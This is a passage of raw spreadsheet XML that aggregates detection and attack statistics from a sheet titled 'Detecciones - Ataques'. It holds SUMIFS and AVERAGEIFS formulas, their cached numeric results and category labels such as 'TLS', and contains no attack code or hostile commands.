        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>15</v>
      </c>
      <c r="CI28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>88</v>
      </c>
      <c r="CJ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>2</v>
      </c>
      <c r="CK28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>12</v>
      </c>
      <c r="CL28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>188</v>
      </c>
      <c r="CN28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>1</v>
      </c>
      <c r="CO28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>27</v>
      </c>
      <c r="CP28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>113</v>
      </c>
      <c r="CQ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>7</v>
      </c>
      <c r="CR28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>65841</v>
      </c>
      <c r="CT28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>1002</v>
      </c>
      <c r="CU28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>13</v>
      </c>
      <c r="CW28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>10</v>
      </c>
      <c r="CZ28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>76</v>
      </c>
      <c r="DE28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>2</v>
      </c>
      <c r="DF28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>26</v>
      </c>
      <c r="DG28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>911</v>
      </c>
      <c r="DI28" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>116</v>
      </c>
      <c r="DJ28" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>17</v>
      </c>
      <c r="DK28" s="271"/>
      <c r="DO28" s="357"/>
      <c r="DP28" s="358" t="s">
        <v>2093</v>
      </c>
      <c r="DQ28" s="359">
        <v>1.0</v>
      </c>
      <c r="DR28" s="359">
        <v>2.0</v>
      </c>
      <c r="DS28" s="359">
        <v>2.0</v>
      </c>
      <c r="DT28" s="359">
        <v>3.0</v>
      </c>
      <c r="DU28" s="360">
        <v>4.0</v>
      </c>
      <c r="DV28" s="271"/>
      <c r="DW28" s="358" t="s">
        <v>2093</v>
      </c>
      <c r="DX28" s="359">
        <v>2.0</v>
      </c>
      <c r="DY28" s="359">
        <v>3.0</v>
      </c>
      <c r="DZ28" s="359">
        <v>3.0</v>
      </c>
      <c r="EA28" s="359">
        <v>4.0</v>
      </c>
      <c r="EB28" s="360">
        <v>5.0</v>
      </c>
      <c r="EC28" s="271"/>
      <c r="ED28" s="280"/>
      <c r="EG28" s="279"/>
      <c r="EH28" s="271"/>
      <c r="EI28" s="361" t="s">
        <v>2093</v>
      </c>
      <c r="EJ28" s="362">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EK28" s="362">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI28 &amp; "*")</f>
        <v>20</v>
      </c>
      <c r="EL28" s="362">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI28 &amp; "*")</f>
        <v>30</v>
      </c>
      <c r="EM28" s="362">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI28 &amp; "*")</f>
        <v>49</v>
      </c>
      <c r="EN28" s="363">
        <f t="shared" ref="EN28:EN41" si="4">EM28</f>
        <v>49</v>
      </c>
      <c r="EO28" s="364"/>
      <c r="EP28" s="364"/>
      <c r="EQ28" s="364"/>
      <c r="ER28" s="364"/>
      <c r="ES28" s="364"/>
      <c r="ET28" s="364"/>
      <c r="EU28" s="364"/>
      <c r="EV28" s="330" t="s">
        <v>2093</v>
      </c>
      <c r="EW28" s="365">
        <f>EJ28/EB28</f>
        <v>0.8</v>
      </c>
      <c r="EX28" s="365">
        <f>EK28/EB28</f>
        <v>4</v>
      </c>
      <c r="EY28" s="365">
        <f>EL28/EB28</f>
        <v>6</v>
      </c>
      <c r="EZ28" s="366">
        <f>EM28/EB28</f>
        <v>9.8</v>
      </c>
      <c r="FA28" s="367"/>
      <c r="FC28" s="334" t="s">
        <v>2462</v>
      </c>
      <c r="FD28" s="335" t="s">
        <v>2463</v>
      </c>
      <c r="FE28" s="368">
        <f>AVERAGE(ET49:ET62)</f>
        <v>0.8641203704</v>
      </c>
      <c r="FF28" s="368">
        <f>AVERAGE(ES49:ES62)</f>
        <v>0.7219836202</v>
      </c>
      <c r="FG28" s="368">
        <f>AVERAGE(ER49:ER62)</f>
        <v>0.7210951086</v>
      </c>
      <c r="FH28" s="369">
        <f>AVERAGE(EQ49:EQ62)</f>
        <v>0.8406849251</v>
      </c>
      <c r="FK28" s="303" t="s">
        <v>951</v>
      </c>
      <c r="FL28" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK28 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="FM28" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK28 &amp; "*")</f>
        <v>31</v>
      </c>
      <c r="FN28" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK28 &amp; "*")</f>
        <v>42</v>
      </c>
      <c r="FO28" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK28,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK28 &amp; "*")</f>
        <v>68</v>
      </c>
      <c r="FQ28" s="303" t="s">
        <v>951</v>
      </c>
      <c r="FR28" s="69">
        <f t="shared" ref="FR28:FU28" si="3">1-(FL28/EJ30)</f>
        <v>0</v>
      </c>
      <c r="FS28" s="69">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="FT28" s="69">
        <f t="shared" si="3"/>
        <v>0.125</v>
      </c>
      <c r="FU28" s="306">
        <f t="shared" si="3"/>
        <v>0.2765957447</v>
      </c>
      <c r="FY28" s="370" t="s">
        <v>6</v>
      </c>
      <c r="FZ28" s="371">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BU3:BU139)</f>
        <v>0.04393441684</v>
      </c>
      <c r="GA28" s="371">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BV3:BV139)</f>
        <v>0.0843373494</v>
      </c>
      <c r="GG28" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("UNIQUE(FILTER('(B) - Detecciones - Ataques'!L3:L139,'(B) - Detecciones - Ataques'!IS3:IS139=""✔"",'(B) - Detecciones - Ataques'!L3:L139&lt;&gt;""-""))"),"TLS")</f>
        <v>TLS</v>
      </c>
      <c r="GH28" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0</v>
      </c>
      <c r="GI28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0.1666666667</v>
      </c>
      <c r="GJ28" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0.3333333333</v>
      </c>
      <c r="GK28" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("UNIQUE(FILTER('(B) - Detecciones - Ataques'!L3:L139,'(B) - Detecciones - Ataques'!IS3:IS139=""✔"",'(B) - Detecciones - Ataques'!L3:L139&lt;&gt;""-""))"),"TLS")</f>
        <v>TLS</v>
      </c>
      <c r="GL28" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0</v>
      </c>
      <c r="GM28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0.1666666667</v>
      </c>
      <c r="GN28" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0.3333333333</v>
      </c>
      <c r="GO28" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("UNIQUE(FILTER('(B) - Detecciones - Ataques'!L3:L139,'(B) - Detecciones - Ataques'!IS3:IS139=""✔"",'(B) - Detecciones - Ataques'!L3:L139&lt;&gt;""-""))"),"TLS")</f>
        <v>TLS</v>
      </c>
      <c r="GP28" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0</v>
      </c>
      <c r="GQ28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0.1666666667</v>
      </c>
      <c r="GR28" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0.3333333333</v>
      </c>
      <c r="GS28" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("UNIQUE(FILTER('(B) - Detecciones - Ataques'!L3:L139,'(B) - Detecciones - Ataques'!IS3:IS139=""✔"",'(B) - Detecciones - Ataques'!L3:L139&lt;&gt;""-""))"),"TLS")</f>
        <v>TLS</v>
      </c>
      <c r="GT28" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0</v>
      </c>
      <c r="GU28" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0</v>
      </c>
      <c r="GV28" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG28)</f>
        <v>0</v>
      </c>
      <c r="HC28" s="370" t="s">
        <v>6</v>
      </c>
      <c r="HD28" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!BU3:BU139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.05618851068</v>
      </c>
      <c r="HE28" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!BV3:BV139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.1071428571</v>
      </c>
      <c r="HF28" s="371">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!BU3:BU139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.01851851852</v>
      </c>
      <c r="HG28" s="371">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!BV3:BV139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.03703703704</v>
      </c>
    </row>
    <row r="29">
      <c r="B29" s="277"/>
      <c r="C29" s="271"/>
      <c r="D29" s="271"/>
      <c r="E29" s="271"/>
      <c r="F29" s="271"/>
      <c r="G29" s="278"/>
      <c r="J29" s="277"/>
      <c r="K29" s="376"/>
      <c r="L29" s="377"/>
      <c r="M29" s="377"/>
      <c r="N29" s="378"/>
      <c r="O29" s="278"/>
      <c r="Q29" s="271"/>
      <c r="R29" s="352" t="s">
        <v>2464</v>
      </c>
      <c r="S29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$S27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*") </f>
        <v>9388</v>
      </c>
      <c r="T29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$T27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $T27 &amp; "*") </f>
        <v>6951</v>
      </c>
      <c r="U29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$U27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $U27 &amp; "*") </f>
        <v>124</v>
      </c>
      <c r="V29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$V27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $V27 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="W29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$W27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $W27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="X29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$X27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $X27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="Y29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Y27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Y27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="Z29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Z27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Z27 &amp; "*") </f>
        <v>8473</v>
      </c>
      <c r="AA29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AA27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AA27 &amp; "*") </f>
        <v>146</v>
      </c>
      <c r="AB29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AB27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AB27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AC29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AC27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AC27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="AD29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AD27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AD27 &amp; "*") </f>
        <v>66843</v>
      </c>
      <c r="AE29" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AE27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AE27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AF29" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AF27) + SUMIFS('(B) - Detecciones - Ataques'!N$3:N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AF27 &amp; "*") </f>
        <v>574</v>
      </c>
      <c r="AG29" s="271"/>
      <c r="AH29" s="352" t="s">
        <v>2464</v>
      </c>
      <c r="AI29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>9384</v>
      </c>
      <c r="AJ29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>2</v>
      </c>
      <c r="AL29" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>1</v>
      </c>
      <c r="AM29" s="355">
